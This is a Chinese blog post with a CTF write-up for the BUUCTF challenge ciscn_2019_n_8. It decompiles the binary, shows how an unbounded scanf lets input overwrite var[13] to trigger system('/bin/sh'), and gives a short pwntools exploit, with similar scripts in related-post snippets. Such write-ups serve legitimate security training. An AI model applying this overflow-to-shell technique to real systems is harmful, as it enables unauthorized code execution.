ciscn_2019_n_8

最新推荐文章于 2025-04-14 16:35:22 发布
最新推荐文章于 2025-04-14 16:35:22 发布
阅读量831 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: BUU-PWN 文章标签: pwn python wp 信息安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0sway/article/details/123518685
该博客介绍了如何通过分析CISCN_2019_n_8的代码,利用未限制输入长度的__isoc99_scanf函数,构造特定payload覆盖var[13]为17,从而触发系统调用获取Shell。博客详细展示了exploit的编写过程,包括使用pwn库发送payload并进行交互。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ciscn_2019_n_8

使用checksec查看:
在这里插入图片描述
保护算是全开了,似乎有点棘手,先放进IDA中查看下:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp-14h] [ebp-20h]
  int v5; // [esp-10h] [ebp-1Ch]

  var[13] = 0;
  var[14] = 0;
  init();
  puts("What's your name?");
  __isoc99_scanf("%s", var, v4, v5);
  if ( *(_QWORD *)&var[13] )
  {
    if ( *(_QWORD *)&var[13] == 17LL )
      system("/bin/sh");
    else
      printf(
        "something wrong! val is %d",
        var[0],
        var[1],
        var[2],
        var[3],
        var[4],
        var[5],
        var[6],
        var[7],
        var[8],
        var[9],
        var[10],
        var[11],
        var[12],
        var[13],
        var[14]);
  }
  else
  {
    printf("%s, Welcome!\n", var);
    puts("Try do something~");
  }
  return 0;
}
  • var是一个数组
  • var[13] = 0;var[13]已经被初始化为0了
  • if ( *(_QWORD *)&var[13] == 17LL ) system("/bin/sh");:只需要满足var[13] == 17即可getshell

题目思路

  • 只需要满足var[13] == 17即可getshell
  • __isoc99_scanf()函数没有限制输入数据的长度
  • 直接将var[13]覆盖成17就行了

步骤解析

完整exp

from pwn import *

#start
# r = process("../buu/ciscn_2019_n_8")
r = remote("node4.buuoj.cn",25323)

#paramas

#attack
payload = p32(17) * 14
r.recv()
r.sendline(payload)

r.interactive()
BUUCTF pwn ciscn_2019_n_8
菜的只能随便写写博客
02-03 2729
0x01 文件分析  文件很简单,32位,保护都开得差不多。   0x02 运行  输入并且回显。   0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 681
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
ciscn_2019_n_8 1(读懂代码即可)
最新发布
Snk0xHeart的博客
04-14 174
开虚拟机checksec32位,保护开了一堆,但是我们先别慌扔进IDA(32位),找到main,F5反编译分析一下,就是把var数组中从第 14 个元素(索引为 13)为起始的8字节数据当作一个_QWORD类型的值(通常为 64 位无符号整数)来处理,接着将其和长整型常量17进行比较,若相等,则给权限给咱们(即,将var[13]赋值为17(8字节),var[13]之前的随便填些字节数据进去即可)(注:qword全称是Quad Word。
BUUCTF ciscn_2019_n_8
、moddemod
06-11 422
exp from pwn import * context.log_level = 'debug' proc_name = './ciscn_2019_n_8' p = remote('node3.buuoj.cn', 26801) # p = process(proc_name) payload = 'a'.encode() * 13 * 4 + p64(17) p.sendline(payload) p.interactive()
【BUUCTF - PWNciscn_2019_n_8
古月浪子的博客
03-27 1216
checksec一下,好叭全开 IDA打开看看,var是int数组,如果var[13]=0x11的话就能get flag from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' sla=lambda x,y:io.sendlin...
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
buuctf之ciscn_2019_c_1
weixin_54452942的博客
04-18 883
通俗易懂
[BUUCTF]-PWN:ciscn_2019_n_3解析
2301_79326813的博客
01-20 923
堆题,先看保护32位,Partial RELRO,没pie关键信息就那么多,看ida大致就是alloc创建堆块,free释放堆块,dump打印堆块内容但是仔细看这三个函数就可以发现在实际运行中,会先创建一个存有free相关函数的地址和打印堆块内容相关函数的地址。看delete函数并结合动态调试,可以知道释放堆块的过程实际上是调用先创造的12字节堆块的rec_str_free。那也就意味着无论那块地址存的是哪里的地址,我们在free堆块时他都会执行,并且题目给了我们system。
[buuctf]ciscn_2019_n_8
逆向萌新的博客
06-19 525
[buuctf]ciscn_2019_n_8
[BUUCTF] ciscn_2019_n_8
Lucien_Carr的博客
04-14 456
这道题非常简单(甚至比ret2text简单...),只需要满足让系统调用system函数的条件,即将var[13]这个数组里全部填上17即可。checksec --file='filename' # filename为下载文件的自定义名称。观察选择条件,只需要满足var[13] = 17就可以。前面有scanf函数,可以直接向var数组输入。开了canary、NX和PIE,似乎防得很严实。主函数里就调用了system函数,运气很好。32位程序,放到IDA中继续分析。攻击成功,运行结果如下。
BUUCTF-PWN-ciscn_2019_n_8
Henlenl的博客
05-18 286
文章目录查看文件信息IDA 分析exp 查看文件信息 checksec 一下,保护还开的挺满 canary(栈保护),nx(堆栈不可执行),PIE(地址随机化) IDA 分析 其实我们应该nc 连一下的查看远程程序运行情况 丢入 32位IDA分析一下 很显然 程序的意思就是让 var[13] == 17就能拿到shell了 exp from pwn import * r = remote('node3.buuoj.cn',27168) #r = process('./ciscn_2019_n_8')
buuctf之ciscn_2019_n_8
weixin_54452942的博客
04-12 757
两个方法解题
buuctf ciscn_2019_n_8
carol2358的博客
04-15 322
ida: 直接有sh,只要让var[13]等于17就可以 exp: from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvl...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值